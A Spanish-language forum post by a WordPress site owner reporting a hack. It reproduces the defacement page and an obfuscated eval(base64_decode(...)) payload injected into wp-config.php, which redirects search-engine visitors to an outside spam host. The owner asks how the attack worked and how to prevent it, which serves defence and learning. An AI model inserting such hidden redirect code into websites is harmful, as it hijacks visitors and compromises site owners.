Tema: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen
Ver Mensaje Individual
  #1 (permalink)  
Antiguo 19/05/2010, 07:55
Avatar de rogertm
rogertm
Mod->Cuba
  
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 18 años, 8 meses
Puntos: 638
Exclamación Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen
Buenos días, no estoy seguro de que sea aquí donde deba publicar este post, pero buej, allá va.

El asunto es que esta mañana me entero de que me han hackeado uno de mis sitios (Wordpress) hospedado en Site5.com. Lo que hicieron fue renombrar el archivo index.php a index2.php, colgaron un nuevo index.php con el siguiente código:
Código HTML: 
Ver original
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Language" content="en-us">
  4. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  5. <title>blackraptor@root~#</title>
  6. </head>
  7. <body bgcolor="#000000">
  8. <div align="center">
  9.     <pre class="style1"><span class="style10"><strong><font size="3" color="#FFFFFF">Ups don't Worry, Your System is Save</font></strong></span></pre>
  10. </div>
  11. <div align="center">
  12.     <pre id="line1" class="style1"><font color="#FFFFFF" size="6"><strong><span class="style10">::: ThiS Site Has Been Hacked :::</span></strong></font></pre>
  13. </div>
  14. <p align="center"><b><font face="Calisto MT" size="7" color="#FF0000">Indonesian</font><font color="#FFFFFF" face="Calisto MT" size="7"> 
  15. Hacker</font></b></p>
  16. <p align="center"><b><font face="Courier New" size="4" color="#FFFFFF">Contact : 
  17. [email protected]</font></b></p>
  18. </body>
  19. </html>

Por suerte decía don't Worry, Your System is Save... y en el wp-config.php me metieron un script injection:

Código PHP: 
Ver original
  1. <?php/*
  2. eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));*/
  3.  
  4. // A partir de aquí todo estaba correctamente
  5.  
  6. ?>

Hace poco me pasó algo muy parecido con el sitio que administro en mi trabajo.

Preguntas:
  • ¿Cómo es que logran hacer eso?
  • ¿Qué medidas puedo tomar para que no suceda más?
  • ¿Debería cambiar el password de conexión a la base de datos?
Saludos y muchas gracias de antemano...
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose